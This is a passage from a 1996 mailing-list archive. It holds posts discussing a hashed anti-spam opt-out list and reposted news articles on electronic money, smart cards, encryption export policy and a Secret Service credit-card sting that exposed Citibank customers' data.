only national labs will be capable of breaking. I would let all the hackers in the world take their cracks at our system. ASAP: Will e-money replace the coin and papernote system we use today? ROSEN: We're not here to replace paper money. Our system will be valuable on the Net. Internet transactions are flaky now. We're trying to take the flakiness out of it. We want to give the user more of the feeling of trust and security experienced in the physical marketplace. ASAP: What's the federal government's role in electronic money? ROSEN: They're watching. They're letting people experiment. The official party line is "We're going to keep our hands off and our nose in." ASAP: Will digital cash make it easy to launder money or evade taxes offshore? ROSEN: It's true that with e-money, geography is gone. All the laws that have been created here and abroad have been based on geography. Two-thirds of our currency now is abroad. So what's the big deal if [e-money] moves abroad? With our system, the feds will have a lot more control over what's going on than they do with the present paper currency system. EMS notes will leave electronic audit trails, and their circulation can be blocked if the system detects that they've been tampered with or duplicated. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 18 00:04:41 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 15:04:41 +0800 Subject: Spam blacklist project In-Reply-To: <3.0b19.32.19960917191100.0069a12c@pop.ricochet.net> Message-ID: Greg Broiles writes: > At 12:52 PM 9/17/96 -0400, Rabid Wombat wrote: > > >I'd say it's a safe bet that the unscrupulous could easily sell a large, > >up-to-date list of email addresses of people who DON'T want junk email to > >people who want to send such mail. > > That's why the list should be distributed (as the original poster > mentioned) in hashed format - the junk email people would then hash their > own list(s), and would know not to send to addresses where the hashes > matched. The unmatched hashes addresses on the "block" list aren't > otherwise useful to the junk e-mail folks. That's an excellent idea! Store the SHA5 of the do-not-e-mail addresses and have the scrubbing program compute SHA5 of the addresses on the spammer's list and delete the ones that match. I guess, fold the case and normalize the %-hacked addresses. > It's an interesting idea .. but who is going to pay for it? (doh.) Not one of the spammers. Perhaps someone at an .edu site. Perhaps some ISP, for free publicity. I'd expect that the service would get a lot of e-mail traffic for the first few weeks, while everyone who cares about it would get their addresses on the list; and then it'll be just another FTP server. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 18 00:10:13 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 15:10:13 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: American Banker: Tuesday, September 10, 1996 Two German Companies Tap U.S. Smart Card Market By VALERIE BLOCK Two German smart card manufacturers that have set their sights on the United States are finding the market big enough for two different strategic approaches. Gieseke & Devrient America Inc., subsidiary of a German currency printer, has become a major supplier of Visa Cash cards, firmly entrenching itself in the world of banking applications. Orga Card Systems Inc., whose German parent is owned by three corporations in that country, is going after the telecommunications industry here. In August, Orga secured a million-card minimum commitment from Omnipoint Corp. for the new digital mobile phone technology known as personal communication services. The deal, covering the New York area, could mean as many as three million cards over three years. Smart cards, with embedded computer chips, contain customer account information and would be used to activate the mobile phone. Orga inked a deal last fall with American Personal Communications, another provider of personal communications services, to supply smart cards for its Sprint Spectrum service in the Washington area. "We're big in telecommunications," said Holger Mackenthun, president of the U.S. Orga operation in Paoli, Pa. "That's where most of the (smart card) applications are." Benjamin Miller, chairman of CardTech/SecurTech, the Rockville, Md.- based conference organizer, called Orga a "major worldwide player" in global standard for mobile telecommunications, or GSM, the international version of the digital mobile phone network. Gieseke & Devrient, with a 150-year history of currency printing,"is tied culturally to the financial industry," said Joseph Schuler, senior vice president of Schlumberger, a leading French smart card company with operations here. Schlumberger and its home-country competitors, Gemplus and Bull Group, supply the lion's share of smart cards in the United States and around the world. Still, Mr. Schuler said the expansion of the U.S. market will create opportunities for all the manufacturers. In Supplying 800,000 cards to NationsBank for the Olympics Visa Cash pilot in Atlanta, Gieseke & Devrient established a firm alliance with Visa. It is vying to participate in the New York smart card test scheduled to begin early next year with Visa, MasterCard, Citicorp, and Chase Manhattan Corp. The German company also supplied card-dispensing machines to Wachovia Corp. for the Atlanta pilot and 5,000 Visa Cash cards for BankAmerica Corp.'s limited-edition Olympic series. R. Kirk Brafford, program manager, Gieseke & Devrient in Reston, Va., said since his hiring in 1994, he has laid groundwork, established relationships, and generally spread the word about the company. "Things started to kick in last fall with Visa Cash," he said. While profits have not yet materialized for U.S. operations, its German parent, Gieseke & Devrient GmbH posted $240 million in card revenues for 1995. Orga's German parent, Orga Kartensysteme GmbH, garnered $85 million in card revenues for 1995. Mr. Brafford said Gieseke & Devrient has been a global standard for mobile telecommunications pioneer in Germany and elsewhere. It competes for personal communication services applications as well as prepaid phone cards and other telecommunications applications, but it has been held back by a fastidious "quality orientation," said Mr. Miller. Over-the-air initialization for digital mobile communications had not been standardized, so Gieseke & Devrient didn't offer the feature that other companies, like Orga, promoted through proprietary means. Mr. Brafford said a standard was recently put in place, and the company will offer the feature soon. He also said the organization is working with several satellite communications companies to supply smart cards for their activation systems. Orga -- owned by Preussag, a giant German steel maker; Bundesdruckerei, a federal printing company comparable to the U.S. Mint; and Detecon, a consultancy owned by Deutsche Telekom, Deutsche Bank, and Dresdner Bank -- was formed 11 years ago as a smart card producer for global standard for mobile telecommunications and prepaid phone applications. It has been less aggressive in the financial services industry. Several industry sources said Preussag is dissatisfied with the company and wants to divest. Mr. Mackenthun said the steel maker may indeed sell its shares to the other two owners, to better concentrate on its core business. Orga also suffered a setback in its attempt to secure a card manufacturing base in the United States. It announced a joint venture last year with Kirk Plastic Co., which could have given Orga a U.S. presence similar to those of Gemplus or Schlumberger. That deal fell through, and last month Kirk Plastic, the second-largest bank card producer in the United States, was sold to Francois-Charles Oberthur, a French currency printer that co-owns a smart card operation with Bull Group. Kirk Hyde, president of Los Angeles-based Kirk Plastic, said Orga was stumbling in the banking arena, but other observers said financial differences split the companies. Though Orga supplied 20,000 reloadable, stored-value cards for MasterCard's Australian smart card pilot, the company is not bidding on the New York test. Mr. Mackenthun said that was because it cannot produce cards and personalize them here. Still, Mr. Mackenthun is optimistic that Orga will either purchase another plastics maker or set up personalizing facilities of its own in the near future. Gieseke & Devrient acquired Security Card Systems of Toronto earlier this year and has a plant in Mexico City. It expects to purchase a U.S. facility as well. Through its Toronto facility, it will manufacture cards for Mondex's Canadian issuers. InformationWeek: September 9, 1996 Wall Street Sharing Data To Get An Edge By Udayan Gupta If you listen to all the media stories about Wall Street and technology, you may come away convinced that preparing systems for the year 2000 is subsuming all other technology projects in the financial community. Nothing could be further from the truth. Sure, making the year 2000's two-zero datefields work is a nagging headache. But a bigger concern for Wall Street is how to keep pace with technology without tearing apart the whole organization. How does a company adopt the latest systems and software, train users, and still not miss a beat in its regular business? The choice for many financial services companies is to expand the use of and access to technology within the organization, focusing on connectivity and improved productivity. "We aren't slowing down on the introduction of technology. We simply are stepping up our technology training," says Howard Sorgen, CIO at Merrill Lynch & Co. in New York. Speed and data availability have been the key competitive elements for financial services companies. To gain an edge in these areas, companies have experimented with a wide array of technology. But such experimentation has takenplace with little internal coordination, leaving large financial institutions with disparate and confusing systems. Not surprisingly, financial services companies are consolidating their technology, says Jim Ogorchock, business development manager for financial services at EMC Co., a Hopkinton, Mass., data storage provider. Consolidation has meant finding ways to disseminate data and information across the enterprise and making data easier to use, he explains. There is greater emphasis on data warehousing, for example,and on finding ways to make data more accessible. ESI Securities Co., a New York broker that specializes in trading technology, is also looking for ways to make data more accessible to more people. "We have moved from being a linear information process to an integrated process," says Jeanne Murtaugh, ESI's vice chair. Instead of different people handling data at various points in the chain, one person can have access to all data at once, dramatically cutting the time it takes to act on the data. At many financial institutions, the focus is on expanding choice and connectivity, says Murtaugh. ESI has found that there is big demand for its trading products and services because they give users greater flexibility and are compatible with other systems. Not The Enemy Connectivity also is being sought through the Internet, says Matt de Ganon, president of K2 Systems, a New York Internet access designer. "Financial services companies are recognizing that the Net isn't an enemy competing to provide services. It's an additional conduit," de Ganon says. He adds that a growing number of financial services companies are willing to use the Internet to provide data to investors. The Internet is also seen as a transactional tool, one that allows data gathering and information dissemination at a more rapid and cost-efficient rate. Equifax Inc., for example, plans to make credit data available to its subscribers on the Net, providing easier access to the data at vastly reduced prices, says Dan McGlaughlin, president and chief technology officer of the Atlanta company. Equifax keeps credit information on nearly 200 million U.S. consumers. Acceptance of the Internet as an integral business tool is only part of the change at financial services companies. Many of them are abandoning proprietary software and hardware for more generic solutions, especially if those solutions provide the choices and connectivity that companies need. Technology users are searching for a common platform that can provide ready solutions and is easily scalable, says Jonathan Wolf, VP of marketing and sales for Track Data, a New York provider of market data systems. Increasingly, IT executives at financial services companies are looking at a Windows NT environment, Wolf says. Many of the companies that traditionally havehad Unix environments-such as First Boston and J.P. Morgan-are looking for greater connectivity. They are implementing off-the-shelf solutions instead of insisting on proprietary systems, Wolf adds. Nowhere is this desire for choice and connectivity more intense than at Merrill Lynch, the financial services company with the highest annual IT expenditure. This month, Merrill Lynch will launch Trusted Global Advisor, a technology platform for its financial consultants. The system consists of 25,000 IBM multimedia PCs using the Microsoft Windows NT operating system and linked by 1,200 servers. Using the NT platform "allows us to buy our applications rather than build," says CIO Sorgen. Merrill Lynch still uses Unix for industrial-type applications such as data-intensive analytical computation, but NT will become the norm for retail applications, he adds. By turning to off-the-shelf applications, Merrill Lynch hopes to cut the cost of technology consultants. In order to hasten the use of new technology, the company relied heavily on outside consultants. Indeed, almost 20% of the company's IT expenditures over the past five years went to pay for outside help, says Sorgen. Now Merrill Lynch is looking to widely available solutions and in-house training to sharply reduce its technology personnel cost. Keeping Control Not that the company wants to avoid everything proprietary. Merrill Lynch is following the lead of financial institutions such as Citibank in offering its retail customers an online service with a wide range of uses-from stock quotes and other financial information to direct orders to financial consultants. But instead of making the online service available on popular online networks, Merrill Lynch plans to maintain control over its customers' data. "You really don't want to allow sensitive data to pass across the Net without the development of some real security safeguards," says Sorgen. Just down the block from Merrill Lynch, American Express is taking a slightly different tack. It, too, is focusing on technology integration, but American Express wants to create a global platform that is both easy to use and scalable. American Express already has invested heavily in its ExpressNet and is focusing on developing a World Wide Web site for its small- business customers. In late July, it announced a joint venture with Microsoft to develop a travel service on the Internet (IW, Aug. 5, p. 35). Channel Change CIO Allan Loren says American Express is focused on two main goals:reengineering the company and helping to deliver new products. "We're changing distribution channels," says Loren, emphasizing the use of the Internet in helping distribute new products and expand the transactional capabilities of the company. Nearly half of IT expenditures at American Express is going toward reengineering and new product development, Loren estimates, and about 40% is being used to maintain its technology operations. The rest is being used to determine new directions for the company in a highly charged and competitive business environment. For other financial services companies, the technology challenge has been to find expanded use for data and consequently develop a broader range of products,says Equifax president McGlaughlin. Investment in technology at Equifax is related to moving away from mass-marketed, commodity information to more customized information solutions, he says. The company also is attempting to create more real-time data. Its data gatherers use notebook computers to record and transmit data, and the company plans a major investment in parallel processors to handle the bigger volume of data it hopes to soon generate. Three years ago, all of Equifax's data was stored in mainframes, available only to Equifax technical staff. Now, says McGlaughlin, with the mainframes replaced by servers and networked PCs, nearly two-thirds of the data is at customer terminals. "We're much closer to the leading edge now," he says. "New technology has allowed us to free up our resources and devote more of them to developing applications rather than storing data." Too often in the past, technology investment has meant large computers and proprietary software, resulting in systems that didn't allow enterprisewide use of technology. The front and back offices remained separate entities. Now, with the expanded availability of application software-ranging from enterprise resource planning to object-oriented databases-it has been possible to gradually merge the front and back offices and give users more data and more tools with which to use data. The result, industry executives say, isn't simply improved productivity but also sharply reduced costs to the entire enterprise. Reuters: Wednesday, September 11, 1996 Industry Groups Lobby for More Encryption Exports By Aaron Pressman A broad coalition of corporations went to Capitol Hill on Tuesday to lobby in favor of relaxed export restrictions on computer encoding technology. On Thursday, the Senate Commerce Committee will mark-up the Promotion of Commerce Online in the Digital Era Act of 1996 known as Pro-CODE, a bill that would abolish most export restrictions. Under a Cold War-era munitions statute, only weak encryption programs created in the United States can be sold abroad, although domestic use of encryption is not regulated. Companies in the high-tech industry argued they are losing business to foreign competitors who are not bound by U.S. export restrictions. And multinational companies in other industries said the the restrictions hamper their ability to conduct business overseas. "We are at a competitive disadvantage vis-a-vis our foreign competitors and that is an unacceptable situation," Gregory Garcia, director of international trade affairs for the American Electronics Association, said at a press briefing here. The Pro-Code bill, sponsored by Republican Senator Conrad Burns of Montana, Democratic Senator Pat Leahy of Vermont and others, has bipartisan support in the Commerce Committee. "We support the Burns bill because it does enable companies to utilize encryption technology securely which is vital if we're going to compete in a very tough global marketplace," Victor Parra, president of the Electronic Messaging Association, said. The association represents companies that rely on electronic communications, including Exxon Corp , Citicorp and Boeing, Parra said. Encryption programs use mathematical formulas to scramble information and render it unreadable without a password or software "key." Earlier this week, Senator James Exon, the Nebraska Democrat, came out against the current bill in a letter to Commerce Committee chairman Sen Larry Pressler. Exon will likely offer amendments at the mark-up, an aide to the senator said. The Clinton administration opposes the Pro-CODE bill, arguing that export of encryption technology would hamper law enforcement and intelligence gathering operatiobns. The House Judiciary Committee will hold a hearing on a similiar measure on September 25. Financial Times: Thursday, September 12, 1996 Japan on the Fast Track for the Electronic Purse By William Dawkins LONDON-- Japan yesterday belatedly joined the international race for a cashless society, when Nippon Telegraph and Telephone, the telecommunications giant, unveiled what it claims will be a secure yet confidential electronic purse that could be used by any bank account holder. The electronic money system, developed with the help of a think-tank attached to the Japanese central bank, aims to provide consumers with a "smart" card which would be used to buy goods and services in shops, vending machines or over the Internet and could be topped up by being plugged into a cash dispenser or telephone. In common with some other systems, the Japanese version would also give customers personal digital signatures, to stem fraud. Smart cards contain computer microchips - rather than the magnetic strip that has become the industry standard - which enable them to be used not only to carry out financial transactions but also to store data. The NTT card is similar to other electronic purses, such as the one being tested by Mondex, a UK-led global consortium of 17 banks, which has run a trial of its card in in Britain for more than a year. The market for electronic purses is being contested by global credit and charge card organisations Visa, MasterCard and Europay, which are all holding trials of their own cards. What NTT claims is unique about its plan is that it envisages the establishment of a digital central bank, which would issue electronic cash on the cards to customers in co-operation with the retail banks where they hold accounts. The aim, said Mr Hiroshi Yasuda, an NTT executive, is to enable participating banks to issue compatible electronic purses, thus avoiding the competition over technical standards which has dogged other systems. Mondex, for example, does not comply with technical standards for chip cards set by Europay, MasterCard and Visa. Some critics of Mondex say it will falter internationally because of this non-compliance. However, Mondex says standards are important only in that card-users and retailers do not want to have multiple point-of-sale terminals to accept the cards. Understandably, NTT wishes to retain technical mastery of the system, which is why it has applied for a Japanese patent for the computer software that would enable the digital central bank and private sector banks to operate together. Electronic purses operators across the world say that it will take at least a decade for consumers to make the switch in large numbers. The change is likely to take longer in Japan, where consumers and companies favour paper money. Most small and medium-sized companies still pay suppliers in paper, delivered in person. Banks refuse to set up standing orders. Cash is instead sent by post. Credit and charge cards are not widely accepted. The average citizen's wallet bulges with cash, not cards. The NTT proposal is the strongest of several rival and incompatible Japanese experiments, carried out by the Ministry of International Trade and Industry and the Ministry of Posts and Telecommunications. NTT will ask the ministries to adopt its system, to pave the way for a single standard cashless nation. William Dawkins --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Wed Sep 18 00:12:15 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 15:12:15 +0800 Subject: [NEWS] Crypto-relevant wire clippings Message-ID: <7VJFuD100w165w@bwalk.dm.com> Los Angeles Times: Monday, August 26, 1996 Credit Sting Involves Hacker And Citibank Cardholders By JIM NEWTON, TIMES STAFF WRITER When U.S. Secret Service agents set a trap for a young computer operator who had expressed an interest in stealing credit information, they baited it well: with real credit card numbers from real customers. The young man, Ari Burton of Las Vegas, went for it, was arrested and was charged with possession of stolen credit information--charges to which he ultimately pleaded guilty. That ended the case against Burton, but the cardholders' information did not stay secret with the Secret Service. Detailed credit histories of 35 Citibank cardholders, none of whom gave their permission for their files to be accessed, ended up with the defendant, his lawyers and anyone else who got a copy of the case file. Included in it: names, addresses, home phone numbers, Social Security numbers, credit card numbers, available credit lines and outstanding balances--more than enough for anyone to run up huge tabs on unsuspecting customers. The cardholders were never warned that their information had been used in a sting, or that it had subsequently been shared with the defendant and others. In fact, a few of the cardholders only learned of the disclosure when the defendant's father wrote asking whether they had authorized the release of the information. Others found out just last week, three years after the information was first released, when contacted by The Times. Told of their unwitting involvement in a federal sting, many were furious. "I'm upset, I'm real upset," said Joe Becker of Costa Mesa. "I want to know how this happened." "I never authorized anything like that," said Sarah DiBoise, who lives in Atherton. "I am certainly bothered by it." And Sam Zadeh, who lives in New York, deplored what he called the "bank and law enforcement agency invading our privacy." The same revelations that left cardholders smoldering also raised troubling questions about the conduct of the government and of the bank that released private information to the Secret Service. Some of those questions ripple into delicate areas of criminal law--topics such as the right of defendants to evaluate evidence against them and the right of uninvolved citizens to maintain their privacy while federal agents try to corral bad guys. Why, lawyers, cardholders and others asked, would the Secret Service use real cardholder information for sting operations? And even if, for legal reasons, it feels compelled to use actual credit histories, why not seek permission from cardholders first? Finally there is this question: How many cardholders nationally are exposed to disclosure of their credit information through government operations? Authorities in some other parts of the country say they do not use real credit information, and Citibank stresses that the Burton case was an aberration. But investigators and prosecutors in Las Vegas said the techniques used to nab Ari Burton are employed in other instances. In fact, Secret Service agents in Las Vegas say the use of real credit information is forced upon them by federal law requiring authorities to demonstrate that a suspect actually possessed something illegal in order to win in court. "In something of this nature, the crime is the illegal obtaining of what is called the access device," said Jerry Wyatt, assistant special agent in charge of the Secret Service office in Las Vegas. "Unless the access device is a real number, it's just a number." Following that theory, some authorities argued that if the Secret Service had supplied Burton with fake credit card information, Burton could not have been found guilty of attempting to steal real credit card histories. But that reading of the law is hotly contested by experienced lawyers. Although it is a violation of federal law to have unauthorized possession of an access device--another name for a credit card number--it also is against the law to attempt to possess such a device, even if that attempt turns out not to be successful. Legal experts said agents could make up fictitious customers and generate false credit histories, then use that information in sting operations. Even without a handoff of real credit information, prosecutors still could charge the objects of the stings with attempting to steal credit card numbers, an approach that might slightly complicate criminal cases but that would protect cardholders. Wyatt said he was not familiar enough with the facts of the Burton case to know why that approach was not adopted. Nor could he say how many cases each year involve the knowing transfer of actual credit information from the government to criminal suspects--only that such cases are not unusual. At the U.S. attorney's office in Las Vegas, the chief of that office's criminal division agreed that other tactics might have minimized the risk to cardholders in the Burton case, but he said the Las Vegas office typically uses real credit card numbers of actual cardholders in luring suspects such as Burton. "We're sensitive to disclosing too much personal information," said John Ham of the U.S. attorney's office. "But whenever we charge credit card cases, we include names and numbers." As for its role, Citibank acknowledged releasing the files to the government but defended its actions by saying it meant no harm and by stressing that its customers' privacy is its highest priority. "We would never do anything to jeopardize our customers," said Maria Mendler, a spokeswoman for the bank, which has a reputation for vigorous protection of its cardholders' privacy. She acknowledged that real information was supplied in the Burton case, but she said the bank did not intend for that information ever to surface in a court file or otherwise become available to the defendant and others. In 1993, the bank also defended its actions in a letter to a lawyer by noting that while information had been released, it had not been done to hurt anyone. "We submit that the actions as alleged do not include the requisite element of an intention to do harm to those customers whose information was disclosed," an associate general counsel for Citibank wrote at the time. Those explanations hold little sway with Citibank customers, however, many of whom complained that if their personal credit histories were going to be used in a sting operation, they at least deserved to be notified so that they could apply for new card numbers once the operation was over. Instead, sensitive information about them and their credit has been kicking around a court file for more than three years--available to, among others, Burton, a man who has admitted that he tried to steal credit information. There is no evidence that Burton or anyone else used the card information gathered in that case to ring up bills, but that, too, is little comfort to the cardholders. "Financial information is private, and I have a right to privacy," said Becker, one of those whose credit information was used by the Secret Service. "I'm worried about how this information might be used now that it's out there." Experienced defense and civil rights lawyers, who are used to analyzing government conduct and subjecting it to harsh scrutiny, said they were taken aback by the actions of the Secret Service and Citibank in the Burton case. "I would think these people could sue for invasion of privacy," Century City defense lawyer Harland W. Braun said of the cardholders. Paul Hoffman, a Los Angeles civil rights lawyer, said he too was surprised by the use of private information in a sting. "It does seem amazing to me," he said. "These people have rights, too." Legal experts with both defense and prosecution backgrounds acknowledged that problems might have confronted the Secret Service had it tried to avoid offending customers by fabricating card numbers or inventing fake credit histories. But they said those problems probably could have been overcome, and added that in any event, they did not pose enough of an obstacle to justify accessing credit information without permission. "The answer to that is you get real people who are willing to have their credit cards used that way," said Hoffman. "If you're doing a sting in a house, it doesn't mean you go into a neighborhood and take a house. Why should this be different?" Complicating the issue still further is a decision by the prosecutor in the case. Once the Secret Service and Citibank had used real credit histories to bait the trap for the sting, the U.S. attorney in Las Vegas was presented with a case in which the evidence against the defendant involved personal information whose disclosure might harm innocent citizens. That type of situation can pose a difficult dilemma for a prosecutor: Federal rules require that prosecutors share evidence with their defense counterparts so that defendants know what they might face at trial, and failing to do so can allow suspects to go free. On the other hand, disclosing the information might put other people at risk. In general, careful prosecutors tend to err on the side of providing information to the defense even if it may create hazards for others. In the Burton case, however, some experts argue that the privacy rights of the cardholders should have outweighed the defendant's right to confront the specific identifying information; an edited list of cardholder information should have sufficed in a case such as this one, they said. The solution, according to those experts, would have been for prosecutors to ask the judge to impose a protective order that would have shielded the personal, private information from either the defense lawyer or from the defendant himself. But others maintain that Burton's lawyers were entitled to the information because it was evidence against Burton, and therefore evidence that his lawyers had a right to assess and consider in deciding their legal strategy. Ham, the chief of the Las Vegas office's criminal division, echoed that view, saying his office had no choice. "We have to provide documents that support the charges," he said. If prosecutors had not done so, he added, a judge undoubtedly would have forced them to. Ham said no protective order was sought to keep the information from being shared with people other than the defense lawyer. The prosecutor, said noted Los Angeles defense lawyer Donald Re, "probably had the obligation to provide the material in discovery." Re added, however, that a protective order might have been tailored to allow Burton's lawyers to review the material on the condition that they not share it with anyone else, including their client. Because there was no such order, Burton effectively received the same information in discovery that he had sought illegally. Within a month of being arrested, the same government that was charging him with a crime provided him with the list of cardholders and their personal information. "They handed it right back to me," Burton said in an interview. At the same time, Re and others stressed that the prosecutor's decision was a close call and difficult to second-guess. Far more troubling, they said, were the actions that led to it: the bank's disclosure of the material and the Secret Service's decision to hand it over to a suspect. And given the statements by investigators and prosecutors that the techniques used in the Burton case are widely practiced in other investigations, many experts warned that ill-advised government practices may be putting cardholders across the country at risk. "There are a lot of situations where they create a scenario like this where you want to show actual possession, not just an attempt," said Re. "But in those situations, you get consent from somebody. You have a security officer who sets up an account, and you use that account number in the sting. Then there's no harm, no foul. "But you don't give out real information," Re added. "That's just crazy." USA Today: Wednesday, August 28, 1996 Citibank Tightens Rules on Disclosure to Law Enforcement By Jeff Mangum Stung by a sting that nabbed a Las Vegas man for possession of stolen credit information, Citibank says it has changed how it works with law enforcement agencies. Citibank agreed in 1993 to give the U.S. Secret Service credit card information on 35 customers, without their knowledge, to help catch a man who eventually pleaded guilty. Customers' names, addresses, home phone numbers, Social Security numbers, credit card numbers, available credit lines and outstanding balances ``ended up with the defendant, his lawyers and anyone else who got a copy of the case file,'' the Los Angeles Times reported Monday. ``Citibank trusted that the criminal justice system would keep this information safe and confidential,'' the bank said Tuesday. ``As it turned out, that was a mistake.'' Citibank says a relative of the defendant subsequently contacted the affected customers, asking them to join a class-action lawsuit against the bank. That, spokesman Mark Rodgers says, prompted Citibank to contact the customers and change its policy in 1993. ``Were we to consent to a similar operation (now), for example, we would only do so with the express consent of that customer,'' Citibank said Tuesday. Federal law generally prohibits disclosure of financial records. But there are exceptions. ``The general rule of thumb is there has to be a subpoena or a person's consent,'' says Mitch Montagna, a spokesman for AT&T;Universal Card. The American Bankers Association says ``99.9% of the time, customer information is safe and secure.'' Denver Post: Tuesday, September 10, 1996 Editorial U.S. Invades Privacy in Nevada Credit-Card Sting Americans who say they worry about invasions of their privacy have a new reason to fret: In a recent case, the federal government and a major bank willingly gave a suspected crook the credit card numbers and personal histories of citizens -- without their permission or knowledge. The breach of privacy in this Las Vegas, Nev., case was egregious and outrageous. The Clinton administration should reprimand the agents involved, and Congress should amend the laws so that such an affront to citizens' rights never reoccurs. In the case, U.S. Secret Service agents wanted to snare a computer operator who had expressed interest in illegally obtaining credit-card information. They asked Citibank for the names, addresses, Social Security numbers and other credit information on some of the bank's card holders. Citibank complied with the request - but never got the card holders' permission to divulge such personal information, according to a story in the Los Angeles Times. In other words, law enforcement agents handed a suspected credit swindler the very information he would need to carry out a crime. The suspect ultimately pleaded guilty to some of the charges. Many of the card holders heard that their personal records were used to bait a credit-card sting only when the defendant's father contacted them. Others learned about the episode through a newspaper reporter who was covering the case. In theory, there are laws to protect consumers from people prying into their credit histories without their permission. Obviously, these statutes aren't nearly strong enough. American Banker: Monday, September 16, 1996 FUTUREBANKING Mondex, Moving Fast, Sees Long Trek To a Worldwide Cash Alternative By JEFFREY KUTLER Exactly a year passed between the start of the Mondex trial in the southwest England town of Swindon and the creation of Mondex International, the banking consortium that hopes to use the smart card system as the basis for a global alternative to cash. That was fast according to the calendar. It was also an eternity. During those 12 months, National Westminster Bank, the new payment technology's inventor and champion, rode a roller coaster between self- congratulation and a skeptical press, between the celebration of an unprecedented accomplishment and a storm of criticism from within its own industry. Even with the formation July 18 of Mondex International, enthusiastic backing from banking powers as diverse as Wells Fargo Bank and Hongkong & Shanghai Banking Corp., and the current cloning of Swindon in the Canadian city of Guelph -- it relates locationally to Toronto as Swindon does to London - the Mondex eternity continues. The emotional pendulum still swings at Natwest Group headquarters in London. And emanating from Natwest and from within the Mondex project is a mix of messages that underscores how truly groundbreaking is their attempt. Win or lose, whether or not they are understood or praised by their peers, the founders of the Mondex project have risen above the almost weekly cycles of technological change and quarterly pressures on earnings with a longer-term perspective antithetical to the traditional ways of bankers and the banking industry. "Natwest recognizes that Man does not live by short-term profits alone," group chief financial officer Richard K. Goeltz said in a recent interview with American Banker. "There are things we have to bequeath to our successors." Mr. Goeltz -- who moved to New York this month as chief financial officer of American Express Co. -- and others close to Mondex want the world to recognize how far they have come in a year. But the Mondex promoters are quick to point out that it is actually Year 6 since Natwest began to fund them. Today they look at a 10- or 15-year horizon. (Natwest will recover most if not all its development cost by issuing about $150 million of stock in Mondex International. The bank expects to collect further royalties as the system rolls out. Partner bankers do not begrudge Natwest its return for risk taking.) One gets the sense that Natwest's leaders were so well primed for the long haul that it would take more than a few technical glitches and negative newspaper stories to get their goat. Mr. Goeltz dismissed the sniping from more tradition-bound competitors as "slings and arrows" that never hit their mark. Mr. Goeltz and other insiders knew, long before the Mondex International membership roster became public, that the concept was attracting interest. "Broad-scale cooperation" was a prerequisite, written into Natwest's business plan, and 16 other "global founders" who came forward July 18 found the case compelling enough to want to join in the marathon. "This is a process of change management - it's not like flicking a switch," said Roy S. Pratt, deputy chief general manager of Mondex UK Ltd., the British franchise co-owned by Natwest and Midland Bank Ltd. "Our job is not to say, 'This is how it will be.' It is about trends and responsiveness. To say anything is cast in stone at this point would be presumptuous." Mr. Pratt, 49, spent 31 years at Midland Bank before being "seconded" to Mondex UK in 1994. His banking jobs were in treasury, asset/liability, and portfolio management. He said his nontechnological background enabled him to see the complexity of the phenomenon, to confront necessary questions about the known and unknown quantities of a reinvented payment system. "People always want to ask about take-up (acceptance) rates, how fast this will happen, but I am reluctant to make blanket statements," Mr. Pratt said. "Mondex will mean different things to different people. It will not be the same at Exeter University (where it is being introduced this fall) as it is in Swindon. "There is not one proposition or growth rate. What is a critical mass for one segment will be different in another. A carpark will not be the same as a bus. You might call each a micro-Mondex economy. "This is a change process that will be based on value exchange on a just-in-time basis," Mr. Pratt continued. "It is not a product like a loan or deposit package, or even a payment mechanism. It is not mono-dimensional. "And it's not just an issue for bankers. We respect the integrity of the payments process, but we also have a responsibility to society." Such words are hardly bankerly. To be sure, Mondex has rigorous underpinnings. The bankers' thought processes are logical. The strategic plans passed muster with "some of the most sophisticated, hard-nosed bankers in the world," Mr. Goeltz said. "Mondex does have tremendous social implications, not least in terms of what it can do for welfare payments and pensions," Mr. Goeltz said before his recent departure for American Express. By automating cash "it reduces friction in the economy. "But the implications for society were not the motivation for Mondex. It was to serve customers better and generate a return for shareholders. "What's interesting about Mondex was not the technology," Mr. Goeltz went on. "The technology was a facilitator. This is one of the few products I've seen in which all three participants in the value chain -- banks, retailers, and customers -- benefit." The enthusiasm carries over to outsiders - even some who have been lumped among the critics - to a point. "The richness, the robustness of the technology, is fantastic," said H. Eugene Lockhart, president and chief executive officer of MasterCard International. (MasterCard held negotiations with Natwest to buy into or participate in Mondex, but at the same time its European affiliate, Europay International, was developing the competitive Clip electronic purse system.) For more than two years, Mr. Lockhart has insisted on seeing smart cards' "business case," and even as MasterCard launches experiments around the world he is still not completely satisfied. "Let's assume there is a business case," he said. "The opportunity is that we have this new technology platform that can do a lot of things, stored value being only the first manifestation. "But there is a big problem: How on earth do you grow that system in millions of other cases just like Swindon?" Swindon, for now, is "the case." Mondex UK's overly optimistic projection of 40,000 cardholders in the city of 190,000 people set off the bad press. In reality, the 10,000 that signed up within 12 months weren't bad news at all. That's almost 25% of the combined Natwest-Midland customer base in the area. Mondex said its surveys showed 66% of the cardholders said they preferred Mondex to cash. Average card loads were the equivalent of $35 to $45, and the majority of transactions were under $7.50. Perhaps more to the point, it is hard to find a storefront, public phone, or any type of payment device in the commercial center of Swindon that does not accept Mondex. The banks signed 600 merchants, double the number accepting MasterCard and Visa, which stands to reason for a cash replacement. "You can actually go cashless," said Mark Gordon, Mondex International's head of marketing. "It's not a big deal when you present Mondex at the tills." While Mondex has been selective in its data disclosures -- no one denies that its transactions are a small percentage of the Swindon total -- Mr. Gordon and his team have been more than hospitable in letting the world come view Mondex. Banker delegations are commonplace, often gathering at the "Mondex Store" in the town center before setting out to observe and test merchant acceptance. Hardly a day goes by without the visit of a television crew. Many come from Asia, where Mr. Gordon believes "Mondex will really fly." (A Hong Kong pilot is set for late this year, and smart cards of various kinds are already prevalent in Singapore, Taiwan, and elsewhere in the region.) "They see this as a city of the future," he said, "like something out of 'Blade Runner.'" The Mondex staff tries to keep the visits unobtrusive, but some of the merchants were willing to 